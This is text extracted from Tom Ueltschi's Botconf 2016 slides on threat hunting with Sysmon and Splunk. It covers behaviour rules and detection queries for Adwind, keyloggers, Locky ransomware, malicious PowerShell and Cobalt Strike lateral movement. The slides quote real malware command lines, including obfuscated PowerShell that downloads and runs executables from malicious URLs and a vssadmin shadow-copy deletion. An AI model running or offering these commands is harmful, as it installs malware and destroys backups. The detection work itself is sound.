File (exe, doc) Sandbox  
Analysis  Sandbox  results : 
- Report (HTML, XML, JSON)  
- Network traffic  (PCAP)  
- Dropped  / Downloaded  Files  
- Memory - & File -Strings  
- Sandbox  Signatures  
Post Processing  
- XML Report & xquilla  & xpath   files -, reg keys -, mutexes -, proc’s  created  
- PCAP & tshark   DNS -, HTTP -requests , TCP connections  (non -std ports ) 
- Yara  rules  & Files, PCAP, mem  strings   File / Memory / Network patterns  
- VirusTotal  Filehash  lookups , sample submits  (optional)  AV detections  
 
Behavior  Analysis (Proc’s , Files, Reg keys , Network, Persistence ) 
Sysmon  Data in SIEM (Splunk)  
Behaviors  (Proc’s )  Search Queries   Alerts  & Hunting  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 50 Automating  Malware Analysis  
 
180 Behavior  Rules  
 
   21 FILE – file system  
    8 NET  - network 
   20 PERS – persistence methods  
   52 PROC – process activity  
    4 REG  - registry activity  
   21 SIG  - sandbox signature  
   54 YARA – YARA rule matches (file, memory, pcap)  
 
 
Java RAT ( Adwind) behavior  analysis  
 
132 JAR samples analyzed  
 
122 PERS: calls 'reg add' to create '..\CurrentVersion \Run' key 
 (2015-01-05 - ...) 
 15 PERS: creates reg key 'CurrentVersion \Run' to exec malware in '%APPDATA%'  
 
113 PROC: started 'java*.exe' from %APPDATA% \Oracle [Java RAT Adwind] 
 (2015-10-05 - ...) 
118 PROC: uses 'xcopy' to copy JRE to %APPDATA% \Oracle [Java RAT Adwind] 
 (2015-10-18 - ...) 
 
 18 YARA: pcap_java_rat_unknown_1  
 34 YARA: pcap_java_rat_unknown_2  
 
 24 NET: using non-std TCP ports (not http[s], smtp, 587) - likely RATs 
 
 
 Seite 51 Detecting  Java RATs ( Adwind ) 
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
 
 
CommandLine : <PATH-TO-EXE>\*.exe /stext <PATH-TO-TXT>\*.txt 
 
memstr_Limitless_Logger      30 
    logff.txt, logmail.txt  
 
memstr_Predator_Pain         149 
    holdermail.txt, holderwb.txt,  
    holderskypeview.txt, holderprodkey.txt  
 
memstr_HawkEye_Keylogger     134 
    holdermail.txt, holderwb.txt, Mail.txt, Web.txt  
 
memstr_iSpy_Logger           5 
    Browser.txt, Mail.txt  
 
memstr_KeyBase_Keylogger     36 
    Mails.txt, Browsers.txt  
 
 347 samples  (abusing NirSoft Tools for password  «recovery ») 
 
 Seite 52 Detecting  Keyloggers  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 53 KeyBase  Keylogger  (OSINT)  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 54 KeyBase  Keylogger  (OSINT)  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 55 iSpy  Keylogger  (OSINT)  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 56 iSpy  Keylogger  (OSINT)  

 
CommandLine : <PATH-TO-EXE>\*.exe /stext <PATH-TO-TXT>\*.txt 
 
alert_sysmon_suspicious_stext_cmdline  
 
index=sysmon SourceName ="Microsoft -Windows-Sysmon" EventCode ="1" stext 
| search CommandLine ="* /stext *" 
 
 No false  hits in >5 months  
 
But why  does  it use «/stext » parameter  ??? 
 
 
 Seite 57 Detecting  Keyloggers  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
 
 
 Seite 58 Detecting  Keyloggers  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  

 
 Seite 59 Detecting  Keyloggers  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  

 
 Seite 60 Detecting  Keyloggers  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  

 
 Seite 61 Detecting  Keyloggers  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  

 
Continuously  (daily ) analysing  malspam  samples  
–Ransomware  (Locky , NELocker , Cerber , TeslaCrypt  et.al.)  
Know  malicious  behavior  (e.g. process  tree , command  lines ) 
Detect  changes  in behavior , adjust  searches  & alerts  accordingly  
Comparing  two  Locky  samples  from  April and August 2016  
–Behavior  changed  (Vssadmin  vs. Rundll32)  
 
 
 Seite 62 Detecting  Locky  Ransomware  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 63 Locky  analysis  2016 -04-28 
* pid="808" / md5="628D9F2BA204F99E638A91494BE3648E" / parentpid ="2600" 
  cmdline="C:\Users\admin\AppData\Local\Temp\nuNvDiKt.exe " 
* pid="3572" / md5="628D9F2BA204F99E638A91494BE3648E" / parentpid ="808" 
  cmdline="C:\Users\admin\AppData\Local\Temp\nuNvDiKt.exe " 
* pid="3932" / md5="6E248A3D528EDE43994457CF417BD665" / parentpid ="3572" 
  cmdline="vssadmin.exe Delete Shadows /All /Quiet" 
* pid="2480" / md5="F51D682701B303ED6CC5474CE5FA5AAA" / parentpid ="3572" 
  cmdline="C:\Program Files\Mozilla Firefox \firefox.exe   -osint  
           -url  C:\Users\admin\Desktop\_HELP_instructions.html " 
 
 
Locky  calling  vssadmin  to delete  shadow  copies  
 
alert_sysmon_vssadmin_ransomware  
 
index=sysmon SourceName ="Microsoft -Windows-Sysmon" EventCode =1  
    vssadmin.exe  
| search CommandLine ="*vssadmin *"  
    CommandLine ="*Delete *" CommandLine ="*Shadows*" 
 
 
 Seite 64 Locky  using  Vssadmin  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 65 Locky  analysis  2016 -08-23 

 
Rundll32 process  with  
–DLL in «%TEMP%» folder  and «qwerty » parameter  
–Office ( macros ) or scripting  parent  process  (JS, VBS, WSF, HTA ) 
 
alert_sysmon_suspicious_locky_rundll32  
 
index=sysmon SourceName ="Microsoft -Windows-Sysmon" EventCode =1  
    rundll32.exe  
| search Image="* \\rundll32.exe "  
    (CommandLine ="*\\AppData\\Local\\Temp*" CommandLine ="*qwerty*") 
  OR 
    (ParentImage ="*\\winword.exe " OR ParentImage ="*\\excel.exe " OR 
     ParentImage ="*\\cscript.exe " OR ParentImage ="*\\wscript.exe " OR 
     ParentImage ="*\\mshta.exe ") 
  Seite 66 Locky  using  Rundll32  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
 
Locky  behavior  analysis  
 
 90 FILE: drops *.locky files [Locky]   (2016-02-15 - 2016-06-26) 
101 FILE: drops *.zepto files [Locky]   (2016-06-27 - 2016-09-25) 
 33 FILE: drops *.odin files [Locky]    (2016-09-27 - 2016-10-22) 
 
137 FILE: drops '_HELP_instructions.html ' files [Ransomware ] (... - 2016-09-25) 
 33 FILE: drops '_HOWDO_text.html ' files [Ransomware ] (2016-09-27 - ...) 
 
 91 PROC: calls 'vssadmin.exe Delete Shadows /All /Quiet' to delete Shadow Copies 
 (2016-02-15 - 2016-06-26) 
130 PROC: rundll32 %TEMP% \*.dll qwerty (2016-08-22 - 2016-10-10) 
 11 PROC: uses 'PowerShell ' with '-ExecutionPolicy  bypass'  (2016-10-16 - ...) 
 
 Seite 67 Detecting  Locky  Ransomware  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
 
Locky  behavior  analysis  
 
 82 YARA: pcap_ransom_locky_ main_php               (2016-02-15 - 2016-03-24) 
 15 YARA: pcap_ransom_locky_ submit_php             (2016-03-28 - 2016-04-21) 
 45 YARA: pcap_ransom_locky_ userinfo_php           (2016-04-26 - 2016-05-29) 
  8 YARA: pcap_ransom_locky_ access_cgi             (2016-05-29 - 2016-05-29) 
 59 YARA: pcap_ransom_locky_ upload__dispatch_php   (2016-05-30 - 2016-08-01) 
 16 YARA: pcap_ransom_locky_ php_upload_php         (2016-08-03 - 2016-08-18) 
 49 YARA: pcap_ransom_locky_ data_info_php          (2016-08-22 - 2016-09-25) 
 53 YARA: pcap_ransom_locky_ apache_handler_php     (2016-09-26 - 2016-10-22) 
 58 YARA: pcap_ransom_locky_ linuxsucks_php         (2016-10-23 - 2016-11-01) 
 30 YARA: pcap_ransom_locky_ message_php            (2016-11-01 - ...) 
 
 29 YARA: pcap_ransom_locky_ XORed_dll              (2016-09-04 - ...) 
 Seite 68 Detecting  Locky  Ransomware  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
 
Locky  behavior  analysis  
 
 82 YARA: pcap_ransom_locky_main_php               (2016-02-15 - 2016-03-24) 
 15 YARA: pcap_ransom_locky_submit_php             (2016-03-28 - 2016-04-21) 
 45 YARA: pcap_ransom_locky_userinfo_php           (2016-04-26 - 2016-05-29) 
  8 YARA: pcap_ransom_locky_access_cgi             (2016-05-29 - 2016-05-29) 
 59 YARA: pcap_ransom_locky_ upload__dispatch_php   (2016-05-30 - 2016-08-01) 
 16 YARA: pcap_ransom_locky_php_upload_php         (2016-08-03 - 2016-08-18) 
 49 YARA: pcap_ransom_locky_data_info_php          (2016-08-22 - 2016-09-25) 
 53 YARA: pcap_ransom_locky_apache_handler_php     (2016-09-26 - 2016-10-22) 
 58 YARA: pcap_ransom_locky_linuxsucks_php         (2016-10-23 - 2016-11-01) 
 30 YARA: pcap_ransom_locky_message_php            (2016-11-01 - 2016-11-07) 
 
 29 YARA: pcap_ransom_locky_XORed_dll              (2016-09-04 - ...) 
 Seite 69 Detecting  Locky  Ransomware  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  Update from  2016 -10-24:  new  Locky  variant  
 
FILE: drops *.shit files [Locky] 
FILE: drops '_WHAT_is.html ' files [Ransomware ] 
PROC: uses 'PowerShell ' obfuscation  with '^' 
PROC: rundll32 %TEMP% \*.dll EnhancedStoragePasswordConfig  
YARA: pcap_ransom_locky_ linuxsucks_php  
 
Locky  behavior  analysis  
 
 82 YARA: pcap_ransom_locky_main_php               (2016-02-15 - 2016-03-24) 
 15 YARA: pcap_ransom_locky_submit_php             (2016-03-28 - 2016-04-21) 
 45 YARA: pcap_ransom_locky_userinfo_php           (2016-04-26 - 2016-05-29) 
  8 YARA: pcap_ransom_locky_access_cgi             (2016-05-29 - 2016-05-29) 
 59 YARA: pcap_ransom_locky_ upload__dispatch_php   (2016-05-30 - 2016-08-01) 
 16 YARA: pcap_ransom_locky_php_upload_php         (2016-08-03 - 2016-08-18) 
 49 YARA: pcap_ransom_locky_data_info_php          (2016-08-22 - 2016-09-25) 
 53 YARA: pcap_ransom_locky_apache_handler_php     (2016-09-26 - 2016-10-22) 
 58 YARA: pcap_ransom_locky_linuxsucks_php         (2016-10-23 - 2016-11-01) 
 30 YARA: pcap_ransom_locky_message_php            (2016-11-01 - 2016-11-07) 
 
 29 YARA: pcap_ransom_locky_XORed_dll              (2016-09-04 - ..) 
 Seite 70 Detecting  Locky  Ransomware  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  Update from  2016 -10-24:  new  Locky  variant  
 
FILE: drops *.shit files [Locky] 
FILE: drops '_WHAT_is.html' files [Ransomware ] 
PROC: uses 'PowerShell ' obfuscation  with '^' 
PROC: rundll32 %TEMP% \*.dll EnhancedStoragePasswordConfig  
YARA: pcap_ransom_locky_9  ("/ linuxsucks.php ") Update from  2016 -10-26:  new  Locky  variant  
 
FILE: drops *.thor files [Locky] 
FILE: drops '_WHAT_is.html ' files [Ransomware ] 
PROC: uses 'PowerShell ' obfuscation  with '^' 
PROC: rundll32 %TEMP% \*.dll EnhancedStoragePasswordConfig  
YARA: pcap_ransom_locky_ linuxsucks_php  
 
Locky  behavior  analysis  
 
 82 YARA: pcap_ransom_locky_main_php               (2016-02-15 - 2016-03-24) 
 15 YARA: pcap_ransom_locky_submit_php             (2016-03-28 - 2016-04-21) 
 45 YARA: pcap_ransom_locky_userinfo_php           (2016-04-26 - 2016-05-29) 
  8 YARA: pcap_ransom_locky_access_cgi             (2016-05-29 - 2016-05-29) 
 59 YARA: pcap_ransom_locky_ upload__dispatch_php   (2016-05-30 - 2016-08-01) 
 16 YARA: pcap_ransom_locky_php_upload_php         (2016-08-03 - 2016-08-18) 
 49 YARA: pcap_ransom_locky_data_info_php          (2016-08-22 - 2016-09-25) 
 53 YARA: pcap_ransom_locky_apache_handler_php     (2016-09-26 - 2016-10-22) 
 58 YARA: pcap_ransom_locky_linuxsucks_php "        (2016 -10-23 - 2016-11-01) 
 30 "YARA: pcap_ransom_locky_message_php "           (2016 -11-01 - 2016-11-07) 
 
 29 "YARA: pcap_ransom_locky_XORed_dll "             (2016 -09-04 - ..) 
 Seite 71 Detecting  Locky  Ransomware  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  Update from  2016 -11-08:  changing  DLL func’s  frequently  
 
PROC: rundll32 %TEMP% \*.dll test123   (2016-11-01) 
PROC: rundll32 %TEMP% \*.dll runrun    (2016-11-01) 
PROC: rundll32 %TEMP% \*.dll text      (2016-11-02) 
PROC: rundll32 %TEMP% \*.dll GetLine   (2016-11-03) 
PROC: rundll32 %TEMP %\*.44  text      (2016-11-03) 
PROC: rundll32 %TEMP% \*.dll SetText   (2016-11-06) 
PROC: rundll32 %TEMP% \*.dll woody     (2016-11-07) 
PROC: rundll32 %TEMP% \*.dll makefile   (2016-11-07) 
PROC: rundll32 %TEMP% \*.dll set       (2016-11-08) 
PROC: rundll32 %TEMP% \*.dll nipple    (2016-11-08) 
Everybody  
 
PowerShell  
 Seite 72 Detecting  malicious  Powershell  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 73 Malicious  PowerShell  
Behavior  Analysis:  
 
FILE: drops '_HOWDO_text.html ' files [Ransomware ] 
FILE: drops *.odin files [Locky] 
PROC: uses 'PowerShell ' WebClient.DownloadFile () 
PROC: uses 'PowerShell ' obfuscation  with '^' 
PROC: uses 'PowerShell ' with '-ExecutionPolicy  bypass' 
YARA: pcap_ransom_locky_ apache_handler_php  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 74 Malicious  PowerShell  
Behavior  Analysis:  
 
FILE: drops '_HOWDO_text.html ' files [Ransomware ] 
FILE: drops *.odin files [Locky] 
PROC: uses 'PowerShell ' WebClient.DownloadFile () 
PROC: uses 'PowerShell ' obfuscation  with '^' 
PROC: uses 'PowerShell ' with '-ExecutionPolicy  bypass' 
YARA: pcap_ransom_locky_ apache_handler_php  --- mail headers --- 
Date: Mon, 17 Oct 2016 00:27:44 -0000 
From: <eeaquaforest.pad@submitpad.org>  
Subject: 72080482 fourier 
 
--- mail attachments  (spaces replaced  with [_X]) --- 
cf890dc75d01f4bbb5150d1a7d8a4a49  ./EMAIL_89716306_fourier.zip  
2568bd90c574056ea3590aabfb2e6489  ./3.zip  
28a262ca87456fe1278dde4a134084d5  ./ORDER_802.js  
 
--- executables  dropped --- 
3e6bf00b3ac976122f982ae2aadb1c51  dropped/System.dll  
5c6ad37916cfa9974e8cd4a6dc762221  dropped/Jellyfish.jpg  
f72f6608092d4844a29f581444a64828  dropped/Roaming.exe  
 
--- http traffic URLs --- 
hXXp://93.170.104[.]126 /apache_handler.php  
hXXp://www.temporaryv[.]bid/user.php?f=1.dat  
 
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 75 Malicious  PowerShell  
 
PROC: uses 'PowerShell ' WebClient.DownloadFile () 
 
PowerShelL.eXe     -exeCutionPOLICY  bypaSs     -NoprofILe      -WiNDOWsTyle    
HiDdeN (neW-obJeCT   SYsTem.NeT. webCLieNT ).dOwNLoadfile ( 
'http://www.temporaryv.bid/user.php?f=1.dat' 
'C:\Users\******** \AppData\Roaming.exe'); StaRT-procesS 
C:\Users\******** \AppData\Roaming.eXe  
 
index=sysmon SourceName ="Microsoft -Windows-Sysmon" EventCode ="1"  
    (powershell.exe OR cmd.exe) WebClient  DownloadFile   
| search (Image="* \\powershell.exe " OR Image="* \\cmd.exe")  
    CommandLine ="*WebClient *" CommandLine ="*DownloadFile *"  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 76 Malicious  PowerShell  
 
PROC: uses 'PowerShell ' WebClient.DownloadFile () 
First seen: 2015-02-12  /  # samples:  81 
 
cmd /K PowerShell.exe (New -Object System.Net. WebClient ).DownloadFile ( 
'http://136.243.237.222:8080/hhacz45a/ mnnmz.php ' '%TEMP% \pJIOfdfs.exe'); 
Start-Process '%TEMP%\pJIOfdfs.exe';  
 
PROC: uses 'PowerShell ' with '-ExecutionPolicy  bypass‘ 
First seen: 2015-03-03  /  # samples:  58 
 
powershell.exe -noexit -ExecutionPolicy  bypass -noprofile  -file 
C:\Users\*******\AppData\Local\Temp\adobeacd -update.ps1  
 
PROC: uses 'PowerShell ' obfuscation  with '^‘ 
First seen: 2016-09-30  /  # samples:  41 
 
cmd.exe  /C POwER^S^He^LL.exE     -Exe^CuTI^o^npOlic^Y ^bY^P^A^sS      
^-^Nop^r^ofiLe^    -W^I^N^d^oWstylE  HI^Dden     (^neW^-o^BJ^Ect  
SY^sT^Em.n^E^T.^WEBCL^i^EN^T^).DOWN^LOa^Dfi^LE(^ 
'http://caopdjow.top/user.php?f=1.dat' 'C: \Users\*****\AppData\Roaming.EXE');  
^sTAr^t-pR^ocess^ 'C:\Users\*****\AppData\Roaming.EXe ' 
Query doesn’t  match  
«DownloadFile » 
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 77 Malicious  PowerShell  
 
index=sysmon SourceName ="Microsoft -Windows-Sysmon" EventCode ="1"  
    (powershell.exe OR cmd.exe) WebClient  DownloadFile   
| search (Image="* \\powershell.exe " OR Image="* \\cmd.exe")  
    CommandLine ="*WebClient *" CommandLine ="*DownloadFile *"  
 
 
"C:\Windows\System32 \cmd.exe" /c powershell  -command (("New-Object 
Net.WebClient ")).("'Do' + ' wnloadfile '").invoke( 
'http://unofficialhr.top/tv/homecooking/tenderloin.php ', 
'C:\Users\***\AppData\Local\Temp\spasite.exe'); & 
"C:\Users\***\AppData\Local\Temp\spasite.exe " 
 
LNK with Powershell  command 
- embedded  in DOCX file (oleObject.bin ) 
 
Sample from 2016-11-10 
efd6071f0e65e1feef36ffdb228c2a23  Copy of bill #BT138.docx  
 
Process tree: 
  * WINWORD.EXE  
      o cmd.exe 
          # powershell.exe  
Remove all 
obfuscation  chars  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 78 Malicious  PowerShell  
 
index=sysmon SourceName ="Microsoft -Windows-Sysmon" EventCode ="1"  
    (powershell.exe OR cmd.exe ) 
| eval CommandLine2= replace(CommandLine ,"[ '+\"\^]","") 
| search (Image="* \\powershell.exe " OR Image="* \\cmd.exe")  
    CommandLine2="* WebClient *" CommandLine2="* DownloadFile *"  
 
 
"C:\Windows\System32 \cmd.exe" /c powershell  -command (("New-Object 
Net.WebClient ")).("'Do' + ' wnloadfile '").invoke( 
'http://unofficialhr.top/tv/homecooking/tenderloin.php ', 
'C:\Users\***\AppData\Local\Temp\spasite.exe'); & 
"C:\Users\***\AppData\Local\Temp\spasite.exe " 
 
CommandLine2:  
C:\Windows\System32 \cmd.exe/cpowershell -command((New -ObjectNet. WebClient )). 
(Downloadfile ).invoke(http://unofficialhr.top/tv/homecooking/tenderloin.php , 
C:\Users\purpural \AppData\Local\Temp\spasite.exe );& 
C:\Users\purpural \AppData\Local\Temp\spasite.exe  
 
 De-obfuscate  simple obfuscation  techniques  
 
Are all ( obfuscation ) problems  solved ? 
 
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 79 Malicious  PowerShell  – or not?  

Query doesn’t  match  
«DownloadFile » 
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 80 Malicious  PowerShell  
 
cmd.exe  /c powershell  -c $eba = ('exe'); $sad = ('wnloa'); (( New -Object 
Net.WebClient  )).( 'Do' + $sad + 'dfile' ).invoke( 
'http://golub.histosol.ch/ bluewin/mail/inbox.php ' 
'C:\Users\*****\AppData\Local\Temp\doc.' + $eba); 
start('C:\Users\*****\AppData\Local\Temp\doc.' + $eba) 
 
«De-obfuscated »: 
 
powershell -c$eba=(exe);$sad=(wnloa);((New-ObjectNet. WebClient )).(Do$saddfile) 
.invoke(http://golub.histosol.ch/bluewin/mail/inbox.phpC :\Users\*****\AppData
\Local\Temp\doc.$eba); start(C:\Users\*****\AppData\Local\Temp\doc.$eba) 
 
LNK with Powershell  command 
- embedded  in DOCX file (oleObject.bin ) 
 
Sample from 2016-11-18 
d8af6037842458f7789aa6b30d6daefb  Abrechnung # 5616147.docx  
2b9c71fe5f121ea8234aca801c3bb0d9  Beleg Nr. 892234 -32.lnk 
 
Strings from oleObject.bin : 
 E:\TEMP\G\18.11.16 \ch1\golub\Beleg Nr. 892234 -32.lnk 
 C:\Users\azaz\AppData\Local\Temp\Beleg Nr. 892234 -32.lnk 
 
 Seite 81 Threat  Hunting  approaches  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 82 Defining  Threat  Hunting  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 83 Defining  Threat  Hunting  
Hunting  always  
involves  a human  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 84 Threat  Hunting  Project  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 85 Threat  Hunting  Project  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 86 Threat  Hunting  Project  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 87 Threat  Hunting  Project  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 88 Threat  Hunting  Project  

Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 89 Threat  Hunting  Project  
«Sysmon  is a very  good  free  tool  that   
can do nearly  anything  you’d  need » 
 Seite 90 Source: Adversary Simulation  
Botconf  2016 | Advanced Incident Detection and Threat Hunting using Sysmon  and Splunk | Tom Ueltschi | TLP -WHITE  

 Seite 91 Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  Red  Team / Adversary  Simulation  

 Seite 92 Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  Red  Team / Adversary  Simulation  
Advanced  Threat  
Tactics  video  series  
(9 x 30 -60 mins ) 
 Seite 93 Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  Red  Team / Adversary  Simulation  
PrivEsc  & LatMov   
to own  a network  
(think  BloodHound ) 
 Seite 94 Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  Red  Team / Adversary  Simulation  
C&C can look  like any 
«normal» HTTP traffic  
No IDS detections !! 
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 95 Cobalt  Strike Features  
Uses  Powershell  
«whoami /groups » ? 
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 96 Cobalt  Strike Features  
Uses  share : ADMIN$, C$, IPC$  
Creates  & starts  new  service  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 97 Cobalt  Strike Features  
DLL / Process  
Injection  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 98 Cobalt  Strike Features  
DLL / Process  
Injection  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 99 Cobalt  Strike Features  
SMB traffic  
between  WS Only  one 
egress  point  
SMB traffic  
between  WS 
 
Can you distinct  between  workstations  and servers  / NAS / filers ? 
Is SMB traffic  between  workstations  (WS) normal?  
Is «whoami  /groups » normal activity  from  users  / admins ? 
How  common  is DLL / process  injection ? (can be legit ) 
–Can you distinguish  benign  from  malicious  injection ? 
How  common  is Powershell  usage ?  
–EncodedCommand ?  Invoke -Expression (IEX)?  
–Parent processes  / user  accounts  running  legit  Powershell ? 
  Seite 100 Getting  ready  to Hunt  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 101 SMB traffic  between  WS 
 
index=sysmon SourceName ="Microsoft -Windows-Sysmon"  
    EventCode =3 Initiated =true SourceIp !=DestinationIp  
    DestinationPort =445 Image!=System  
    (SourceHostname ="WS*" DestinationHostname ="WS*") OR 
    (SourceIp ="10.10.*.* " DestinationIp ="10.10.*.*") 
| stats by ComputerName  ProcessGuid   
| fields ComputerName  ProcessGuid  
 
Search for network  connections  
SMB protocol  (dst port  445)  
Source and destination  are workstations  (hostname  or IP) 
Use «ProcessGuid » to correlate  with  other  event  types  (proc’s ) 
Search for legitimate  SMB servers  (filers , NAS)  
Create « whitelist » to exclude  as legit  dest  
 
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 102 Lateral Movement (admin  shares ) 
CS_Lateral_Movement_psexec  
 
10/18/2016 11:17:12 PM  
LogName=Microsoft -Windows-Sysmon/Operational  
SourceName =Microsoft -Windows-Sysmon 
EventCode =1 
EventType =4 
Type=Information  
... 
Message= Process Create: 
Image: \\127.0.0.1 \ADMIN$\8c0cb58.exe  
CommandLine : \\127.0.0.1 \ADMIN$\8c0cb58.exe  
CurrentDirectory : C:\Windows\system32 \ 
User: NT AUTHORITY \SYSTEM 
IntegrityLevel : System  
ParentImage : C:\Windows\system32 \services.exe  
ParentCommandLine : C:\Windows\System32 \services.exe  
 
Search for admin  share  names  in image  paths  
 
 C:\Windows\system32 \services.exe  
\\127.0.0.1 \ADMIN$\8c0cb58.exe  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 103 Lateral Movement (admin  shares ) 
CS_Lateral_Movement_psexec  
 
10/18/2016 11:17:13 PM  
LogName=Microsoft -Windows-Sysmon/Operational  
SourceName =Microsoft -Windows-Sysmon 
EventCode =1 
EventType =4 
Type=Information  
... 
Message= Process Create: 
Image: C:\Windows\SysWOW64 \rundll32.exe  
CommandLine : C:\Windows\System32 \rundll32.exe  
CurrentDirectory : C:\Windows\system32 \ 
User: NT AUTHORITY \SYSTEM 
IntegrityLevel : System  
ParentImage : \\127.0.0.1 \ADMIN$\8c0cb58.exe  
ParentCommandLine : \\127.0.0.1 \ADMIN$\8c0cb58.exe  
 
Search for admin  share  names  in image  paths  
 
 C:\Windows\system32 \services.exe  
\\127.0.0.1 \ADMIN$\8c0cb58.exe  
C:\Windows\system32 \rundll32.exe  
Botconf 2016 | Advanced Incident Detection and Threat Hunting using Sysmon and Splunk | Tom Ueltschi | TLP -WHITE   Seite 104 Lateral Movement (proc  injection ) 
CS_Lateral_Movement_psexec  
 
10/18/2016 11:17:13 PM  
LogName=Microsoft -Windows-Sysmon/Operational  
SourceName =Microsoft -Windows-Sysmon 
EventCode =8 
EventType =4 
Type=Information  
... 
Message= CreateRemoteThread  detected : 
SourceProcessId : 29340 
SourceImage : \\127.0.0.1 \ADMIN$\8c0cb58.exe  
TargetProcessId : 18476 
TargetImage : C:\Windows\SysWOW64 \rundll32.exe  
NewThreadId : 20060 
StartAddress : 0x0000000000110000  
StartFunction : 
 
